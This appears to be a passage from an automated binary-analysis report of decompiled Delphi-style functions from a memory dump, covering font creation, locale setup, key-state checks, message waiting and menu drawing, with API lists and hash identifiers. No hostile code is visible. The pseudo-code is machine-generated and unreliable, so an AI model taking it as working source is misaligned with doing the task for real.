                                                                        				_v80 = 0;
                                                                        				_v76 = 0;
                                                                        				_v72 = 0;
                                                                        				_t116 = __eax;
                                                                        				_push(_t137);
                                                                        				_push(0x41f601);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t139;
                                                                        				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                                                        				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                        					 *[fs:eax] = 0;
                                                                        					_push(E0041F608);
                                                                        					return E0040436C( &_v80, 3);
                                                                        				} else {
                                                                        					_t76 =  *0x496a74; // 0x2170658
                                                                        					E0041E7FC(_t76);
                                                                        					_push(_t137);
                                                                        					_push(0x41f5d9);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t139;
                                                                        					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                        						_v68.lfHeight =  *(_v8 + 0x14);
                                                                        						_v68.lfWidth = 0;
                                                                        						_v68.lfEscapement = 0;
                                                                        						_v68.lfOrientation = 0;
                                                                        						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                                                        							_v68.lfWeight = 0x190;
                                                                        						} else {
                                                                        							_v68.lfWeight = 0x2bc;
                                                                        						}
                                                                        						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                                                        						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                                                        						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                                                        						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                                                        						E004045A4( &_v72, _v8 + 0x1b);
                                                                        						if(E0040864C(_v72, "Default") != 0) {
                                                                        							E004045A4( &_v80, _v8 + 0x1b);
                                                                        							E00408C90( &(_v68.lfFaceName), _v80);
                                                                        						} else {
                                                                        							E004045A4( &_v76, "\rMS Sans Serif");
                                                                        							E00408C90( &(_v68.lfFaceName), _v76);
                                                                        						}
                                                                        						_v68.lfQuality = 0;
                                                                        						_v68.lfOutPrecision = 0;
                                                                        						_v68.lfClipPrecision = 0;
                                                                        						_t107 = E0041F75C(_t116) - 1;
                                                                        						if(_t107 == 0) {
                                                                        							_v68.lfPitchAndFamily = 2;
                                                                        						} else {
                                                                        							if(_t107 == 1) {
                                                                        								_v68.lfPitchAndFamily = 1;
                                                                        							} else {
                                                                        								_v68.lfPitchAndFamily = 0;
                                                                        							}
                                                                        						}
                                                                        						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                                                        					}
                                                                        					_pop(_t126);
                                                                        					 *[fs:eax] = _t126;
                                                                        					_push(0x41f5e0);
                                                                        					_t81 =  *0x496a74; // 0x2170658
                                                                        					return E0041E808(_t81);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 0041E7FC: RtlEnterCriticalSection.KERNEL32(?,0041E839), ref: 0041E800
                                                                        • CreateFontIndirectA.GDI32(?), ref: 0041F5B6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateCriticalEnterFontIndirectSection
                                                                        • String ID: MS Sans Serif$Default
                                                                        • API String ID: 2931345757-2137701257
                                                                        • Opcode ID: 29ecfd2846ab71fec9c4193a5fb4111e2c3dc0bae6f8b124e61999baa7fe3b75
                                                                        • Instruction ID: c6d3fcb0f525e24af73f531a10b58b6f758537922a732ded3b048f0f413673bb
                                                                        • Opcode Fuzzy Hash: 29ecfd2846ab71fec9c4193a5fb4111e2c3dc0bae6f8b124e61999baa7fe3b75
                                                                        • Instruction Fuzzy Hash: 28516E30A04248DFDB01CFA9C541BCDBBF6AF49304F2580BAD804A7352D3789E96CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00409A84(void* __ebx, void* __edi, void* __esi) {
                                                                        				int _v8;
                                                                        				signed int _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				void* _t53;
                                                                        				void* _t54;
                                                                        				intOrPtr _t80;
                                                                        				void* _t83;
                                                                        				void* _t84;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				intOrPtr _t90;
                                                                        
                                                                        				_t89 = _t90;
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(_t90);
                                                                        				_push(0x409b97);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t90;
                                                                        				_v8 = GetThreadLocale();
                                                                        				_t53 = 1;
                                                                        				_t86 = 0x496758;
                                                                        				_t83 = 0x496788;
                                                                        				do {
                                                                        					_t3 = _t53 + 0x44; // 0x45
                                                                        					E00409A48(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
                                                                        					E0040439C(_t86, _v16);
                                                                        					_t6 = _t53 + 0x38; // 0x39
                                                                        					E00409A48(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
                                                                        					E0040439C(_t83, _v20);
                                                                        					_t53 = _t53 + 1;
                                                                        					_t83 = _t83 + 4;
                                                                        					_t86 = _t86 + 4;
                                                                        				} while (_t53 != 0xd);
                                                                        				_t54 = 1;
                                                                        				_t87 = 0x4967b8;
                                                                        				_t84 = 0x4967d4;
                                                                        				do {
                                                                        					_t8 = _t54 + 5; // 0x6
                                                                        					asm("cdq");
                                                                        					_v12 = _t8 % 7;
                                                                        					E00409A48(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
                                                                        					E0040439C(_t87, _v24);
                                                                        					E00409A48(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
                                                                        					E0040439C(_t84, _v28);
                                                                        					_t54 = _t54 + 1;
                                                                        					_t84 = _t84 + 4;
                                                                        					_t87 = _t87 + 4;
                                                                        				} while (_t54 != 8);
                                                                        				_pop(_t80);
                                                                        				 *[fs:eax] = _t80;
                                                                        				_push(E00409B9E);
                                                                        				return E0040436C( &_v28, 4);
                                                                        			}


                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,00409B97,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409AA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: LocaleThread
                                                                        • String ID: 4w@$<v@
                                                                        • API String ID: 635194068-2181857394
                                                                        • Opcode ID: 031ed5dcb529cad3d0294120807776f5ada001c53162cb20b0110185eb27f802
                                                                        • Instruction ID: 8564910674612e7aa7f8c9bef030902903e116a4d87ded3b75f7abf6dfca8640
                                                                        • Opcode Fuzzy Hash: 031ed5dcb529cad3d0294120807776f5ada001c53162cb20b0110185eb27f802
                                                                        • Instruction Fuzzy Hash: A0319871F001085BDB00DA95D881AAE77ADEBC8314F61807BFA09E7782D63DED018769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E004438EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr* _v20;
                                                                        				intOrPtr _t32;
                                                                        				intOrPtr _t52;
                                                                        				void* _t57;
                                                                        				intOrPtr _t69;
                                                                        				intOrPtr _t76;
                                                                        				void* _t78;
                                                                        				void* _t80;
                                                                        				void* _t81;
                                                                        				intOrPtr _t82;
                                                                        
                                                                        				_t80 = _t81;
                                                                        				_t82 = _t81 + 0xfffffff0;
                                                                        				_t78 = __ecx;
                                                                        				_t57 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_v16 = E004242CC(1);
                                                                        				_push(_t80);
                                                                        				_push(0x4439eb);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t82;
                                                                        				if( *((char*)(_v8 + 0x41)) == 0) {
                                                                        					L3:
                                                                        					_push(0);
                                                                        					_push(E004436F8(_v8, _v16, _t57, __eflags));
                                                                        					_t32 = E004436E8(_v8);
                                                                        					L00426AA8();
                                                                        					_v12 = _t32;
                                                                        					__eflags = 0;
                                                                        					_t69 = _t32;
                                                                        					 *[fs:eax] = _t69;
                                                                        					_push(0x4439f2);
                                                                        					return E004035DC(_v16);
                                                                        				} else {
                                                                        					_t84 = _t78 - 0xffffffff;
                                                                        					if(_t78 == 0xffffffff) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						_v20 = E004242CC(1);
                                                                        						 *[fs:eax] = _t82;
                                                                        						 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4439ad, _t80);
                                                                        						E00425838(_v20, _t78);
                                                                        						E0044351C(_v8);
                                                                        						_push(E004436D8( *((intOrPtr*)( *_v20 + 0x68))()));
                                                                        						_push(E004436F8(_v8, _v16, _t57, _t84));
                                                                        						_t52 =  *((intOrPtr*)(_v8 + 0x3c));
                                                                        						L00426AA8();
                                                                        						_v12 = _t52;
                                                                        						_t76 = _t52;
                                                                        						 *[fs:eax] = _t76;
                                                                        						_push(0x4439d5);
                                                                        						return E004035DC(_v20);
                                                                        					}
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • 734520C0.COMCTL32(?,00000000,00000000,?,00000000,004439EB), ref: 0044398F
                                                                        • 734520C0.COMCTL32(00000000,00000000,00000000,00000000,004439EB), ref: 004439CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 734520
                                                                        • String ID: DA
                                                                        • API String ID: 3632036016-2080325668
                                                                        • Opcode ID: ccd8e2105615a610abee5b20ed0fe88bc36b8bc16ea5897006935c09f0e991ca
                                                                        • Instruction ID: 32eae90527f60b3240dfe4ecec9ccfcab97337b482669b5735be93bbf68b5d75
                                                                        • Opcode Fuzzy Hash: ccd8e2105615a610abee5b20ed0fe88bc36b8bc16ea5897006935c09f0e991ca
                                                                        • Instruction Fuzzy Hash: 75318470B00215AFEB00EF6AC88295EB7F9FB49715B6144B6F414E73A1CB74AE00CB18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E004499B4(intOrPtr __eax, void* __edx) {
                                                                        				char _v8;
                                                                        				signed short _v10;
                                                                        				intOrPtr _v16;
                                                                        				char _v17;
                                                                        				char _v24;
                                                                        				intOrPtr _t34;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t48;
                                                                        				void* _t51;
                                                                        				intOrPtr _t64;
                                                                        				intOrPtr _t67;
                                                                        				void* _t69;
                                                                        				void* _t71;
                                                                        				intOrPtr _t72;
                                                                        
                                                                        				_t69 = _t71;
                                                                        				_t72 = _t71 + 0xffffffec;
                                                                        				_t51 = __edx;
                                                                        				_v16 = __eax;
                                                                        				_v10 =  *((intOrPtr*)(__edx + 4));
                                                                        				if(_v10 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					if(GetKeyState(0x10) < 0) {
                                                                        						_v10 = _v10 + 0x2000;
                                                                        					}
                                                                        					if(GetKeyState(0x11) < 0) {
                                                                        						_v10 = _v10 + 0x4000;
                                                                        					}
                                                                        					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                                                        						_v10 = _v10 + 0x8000;
                                                                        					}
                                                                        					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                                                        					_t34 =  *0x496bf8; // 0x2170880
                                                                        					E004268F8(_t34,  &_v24);
                                                                        					_push(_t69);
                                                                        					_push(0x449ab2);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t72;
                                                                        					while(1) {
                                                                        						_v17 = 0;
                                                                        						_v8 = E004496B8(_v16, 2, _v10 & 0x0000ffff);
                                                                        						if(_v8 != 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_v24 == 0 || _v17 != 2) {
                                                                        							_pop(_t64);
                                                                        							 *[fs:eax] = _t64;
                                                                        							_push(0x449ab9);
                                                                        							_t40 =  *0x496bf8; // 0x2170880
                                                                        							return E004268F0(_t40);
                                                                        						} else {
                                                                        							continue;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        					_t42 =  *0x496bf8; // 0x2170880
                                                                        					E004268F8(_t42,  &_v8);
                                                                        					_push(_t69);
                                                                        					_push(0x449a87);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t72;
                                                                        					_v17 = E00449860( &_v8, 0, _t69);
                                                                        					_pop(_t67);
                                                                        					 *[fs:eax] = _t67;
                                                                        					_push(0x449a8e);
                                                                        					_t48 =  *0x496bf8; // 0x2170880
                                                                        					return E004268F0(_t48);
                                                                        				}
                                                                        				L14:
                                                                        			}


                                                                        APIs
                                                                        • GetKeyState.USER32(00000010), ref: 004499D8
                                                                        • GetKeyState.USER32(00000011), ref: 004499EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: State
                                                                        • String ID:
                                                                        • API String ID: 1649606143-3916222277
                                                                        • Opcode ID: 94615d3298e6c2b1289478aca6bd501869d773b40b841513df6d38ea5f5749f1
                                                                        • Instruction ID: 784b168bbd6622d86c8817c47da5e1e24199c79018d4424b72d08e920171472a
                                                                        • Opcode Fuzzy Hash: 94615d3298e6c2b1289478aca6bd501869d773b40b841513df6d38ea5f5749f1
                                                                        • Instruction Fuzzy Hash: 7A31D670A04384EFEB11EFA6D81169FB7F5EB45304F9684BBE800B6291E7785E00D658
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E00456CA0(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				char _v9;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				intOrPtr _t36;
                                                                        				long _t41;
                                                                        				intOrPtr _t51;
                                                                        				void* _t55;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr* _t67;
                                                                        				intOrPtr _t68;
                                                                        				void* _t74;
                                                                        				void* _t75;
                                                                        				intOrPtr _t76;
                                                                        
                                                                        				_t74 = _t75;
                                                                        				_t76 = _t75 + 0xfffffff0;
                                                                        				_v16 = 0;
                                                                        				_v20 = 0;
                                                                        				_v8 = __eax;
                                                                        				_push(_t74);
                                                                        				_push(0x456dae);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t76;
                                                                        				_t55 = E00456C1C(_v8);
                                                                        				if( *((char*)(_v8 + 0x88)) != 0) {
                                                                        					_t51 = _v8;
                                                                        					_t79 =  *((intOrPtr*)(_t51 + 0x48));
                                                                        					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
                                                                        						E004571F4(_v8);
                                                                        					}
                                                                        				}
                                                                        				E00454DA8(_t55,  &_v20);
                                                                        				E00433724(_v20, 0,  &_v16, _t79);
                                                                        				_t36 =  *0x496c04; // 0x2170d40
                                                                        				E00456E5C(_t36, _v16, _t79);
                                                                        				_v9 = 1;
                                                                        				_push(_t74);
                                                                        				_push(0x456d57);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t76;
                                                                        				if( *((short*)(_v8 + 0xea)) != 0) {
                                                                        					 *((intOrPtr*)(_v8 + 0xe8))();
                                                                        				}
                                                                        				if(_v9 != 0) {
                                                                        					E00456BB8();
                                                                        				}
                                                                        				_pop(_t66);
                                                                        				 *[fs:eax] = _t66;
                                                                        				_t41 = GetCurrentThreadId();
                                                                        				_t67 =  *0x495c4c; // 0x496030
                                                                        				if(_t41 ==  *_t67 && E0041C0B0() != 0) {
                                                                        					_v9 = 0;
                                                                        				}
                                                                        				if(_v9 != 0) {
                                                                        					WaitMessage();
                                                                        				}
                                                                        				_pop(_t68);
                                                                        				 *[fs:eax] = _t68;
                                                                        				_push(E00456DB5);
                                                                        				return E0040436C( &_v20, 2);
                                                                        			}


















                                                                        APIs
                                                                          • Part of subcall function 00456C1C: GetCursorPos.USER32 ref: 00456C25
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00456D6C
                                                                        • WaitMessage.USER32(00000000,00456DAE,?,?,?,004798C4), ref: 00456D8E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CurrentCursorMessageThreadWait
                                                                        • String ID: 0`I
                                                                        • API String ID: 535285469-2983702033
                                                                        • Opcode ID: fd7b748d22305817f75c0356da75bbd64efc841958b29063c3cd77700d717242
                                                                        • Instruction ID: 01c0c099075671609aed48f59db28b1b43af4afac0b60e9a9ce997fa6d685819
                                                                        • Opcode Fuzzy Hash: fd7b748d22305817f75c0356da75bbd64efc841958b29063c3cd77700d717242
                                                                        • Instruction Fuzzy Hash: 0731D830A04248DFDB11DFA5C846B9EB7F5EB45305FA284BAEC00A7352D7796E48CB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 71%
                                                                        			E00424370(intOrPtr __eax, void* __edx, void* __edi) {
                                                                        				intOrPtr _v8;
                                                                        				char _v92;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t41;
                                                                        				void* _t43;
                                                                        				intOrPtr _t52;
                                                                        				intOrPtr _t57;
                                                                        				void* _t59;
                                                                        				void* _t60;
                                                                        				void* _t61;
                                                                        				void* _t64;
                                                                        				void* _t66;
                                                                        				intOrPtr _t67;
                                                                        
                                                                        				_t59 = __edi;
                                                                        				_t64 = _t66;
                                                                        				_t67 = _t66 + 0xffffffa8;
                                                                        				_push(_t60);
                                                                        				_t43 = __edx;
                                                                        				_v8 = __eax;
                                                                        				if(__edx == 0) {
                                                                        					L2:
                                                                        					_push(0x496a44);
                                                                        					L004068AC();
                                                                        					_push(_t64);
                                                                        					_push(0x424428);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t67;
                                                                        					if(_t43 == 0) {
                                                                        						E00402EF0( &_v92, 0x54);
                                                                        						E00424D94(_v8, _t43, 0, 0, _t59, _t60, 0, 0,  &_v92);
                                                                        					} else {
                                                                        						_t61 = _t43;
                                                                        						E00423824( *((intOrPtr*)(_t61 + 0x28)));
                                                                        						E00423828( *((intOrPtr*)(_v8 + 0x28)));
                                                                        						 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_t61 + 0x28));
                                                                        						 *((char*)(_v8 + 0x21)) =  *((intOrPtr*)(_t61 + 0x21));
                                                                        						 *((intOrPtr*)(_v8 + 0x34)) =  *((intOrPtr*)(_t61 + 0x34));
                                                                        						 *((char*)(_v8 + 0x38)) =  *((intOrPtr*)(_t61 + 0x38));
                                                                        					}
                                                                        					_pop(_t52);
                                                                        					 *[fs:eax] = _t52;
                                                                        					_push(E0042442F);
                                                                        					_push(0x496a44);
                                                                        					L004069F4();
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t57 =  *0x41e4f8; // 0x41e544
                                                                        					if(E00403768(__edx, _t57) == 0) {
                                                                        						_t41 = E00414AEC(_v8, _t43);
                                                                        						return _t41;
                                                                        					} else {
                                                                        						goto L2;
                                                                        					}
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A44), ref: 0042439B
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A44,0042442F,00000000,00424428,?,00496A44), ref: 00424422
                                                                          • Part of subcall function 00424D94: RtlEnterCriticalSection.KERNEL32(00496A44,00000000,?,?), ref: 00424E37
                                                                          • Part of subcall function 00424D94: RtlLeaveCriticalSection.KERNEL32(00496A44,00424E82,00496A44,00000000,?,?), ref: 00424E75
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave
                                                                        • String ID: DA
                                                                        • API String ID: 3168844106-2080325668
                                                                        • Opcode ID: 5d0da1682d0e5b429fc274aee8455fbd1da520e3d31fc12b12d033f2833a3ec8
                                                                        • Instruction ID: c0367e46b2f5dfdd1aae6d6533981f87ee97dc4ca3a2f4a29e9ac0bbf231dd87
                                                                        • Opcode Fuzzy Hash: 5d0da1682d0e5b429fc274aee8455fbd1da520e3d31fc12b12d033f2833a3ec8
                                                                        • Instruction Fuzzy Hash: B0210B347042459FCB10EF99D982A9EB7F5EF8C314BA141BAB805E7751CA38ED01DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00449774(void* __eax, void* __edx, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t24;
                                                                        				intOrPtr* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t39;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t45;
                                                                        				int _t50;
                                                                        				void* _t51;
                                                                        
                                                                        				_t51 = __eax;
                                                                        				_t39 = 0;
                                                                        				_t50 = E004496B8(__eax, 1, __edx);
                                                                        				if(_t50 == 0) {
                                                                        					if(( *(_t51 + 0x1c) & 0x00000010) == 0) {
                                                                        						_t45 =  *0x445600; // 0x44564c
                                                                        						if(E00403768(_t51, _t45) != 0) {
                                                                        							E0044878C( *((intOrPtr*)(_t51 + 0x34)));
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					if(( *(_t50 + 0x1c) & 0x00000010) == 0) {
                                                                        						E0044878C(_t50);
                                                                        					}
                                                                        					 *((intOrPtr*)( *_t50 + 0x44))();
                                                                        					_t24 = E00448E24(_t50, _t39, 0, _t50, _t51);
                                                                        					if((_t24 | E00449320(_t50, 0)) != 0) {
                                                                        						E004467FC(_t50, 0);
                                                                        					}
                                                                        					_t27 =  *0x495ad0; // 0x496c04
                                                                        					_t29 =  *((intOrPtr*)( *_t27 + 0x44));
                                                                        					if(_t29 != 0) {
                                                                        						_t42 = _t29;
                                                                        						if( *((char*)(_t42 + 0x22f)) == 2 && _t50 ==  *((intOrPtr*)(_t42 + 0x258)) && SendMessageA( *(_t42 + 0x254), 0x234, 0, 0) != 0) {
                                                                        							DrawMenuBar(E0043CC2C(_t42));
                                                                        						}
                                                                        					}
                                                                        					_t39 = 1;
                                                                        				}
                                                                        				return _t39;
                                                                        			}















                                                                        APIs
                                                                        • SendMessageA.USER32 ref: 004497FA
                                                                        • DrawMenuBar.USER32(00000000,?,00000234,00000000,00000000), ref: 0044980B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DrawMenuMessageSend
                                                                        • String ID: LVD
                                                                        • API String ID: 2625368238-462541549
                                                                        • Opcode ID: 9d3d48822c4483685cc29d77eb33797c0968a31a1f1403c72cd18c5fa7b84299
                                                                        • Instruction ID: cfaac2668dddabe2e03c8476e39bbb8de488bb8272c0d5f02b7a156072d18efa
                                                                        • Opcode Fuzzy Hash: 9d3d48822c4483685cc29d77eb33797c0968a31a1f1403c72cd18c5fa7b84299
                                                                        • Instruction Fuzzy Hash: AF117C307006404BEB21FF6E8C8576B67966F86308F58547AF804CB392DA79EC06A79D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00436968(void* __eflags, intOrPtr _a4) {
                                                                        				char _v5;
                                                                        				struct tagRECT _v21;
                                                                        				struct tagRECT _v40;
                                                                        				void* _t40;
                                                                        				void* _t45;
                                                                        
                                                                        				_v5 = 1;
                                                                        				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                                                        				_t45 = E00414264( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                                                        				if(_t45 <= 0) {
                                                                        					L5:
                                                                        					_v5 = 0;
                                                                        				} else {
                                                                        					do {
                                                                        						_t45 = _t45 - 1;
                                                                        						_t40 = E00414208(_t44, _t45);
                                                                        						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							E00435F4C(_t40,  &_v40);
                                                                        							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                                                        							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						goto L6;
                                                                        						L4:
                                                                        					} while (_t45 > 0);
                                                                        					goto L5;
                                                                        				}
                                                                        				L6:
                                                                        				return _v5;
                                                                        			}









                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$EqualIntersect
                                                                        • String ID: @
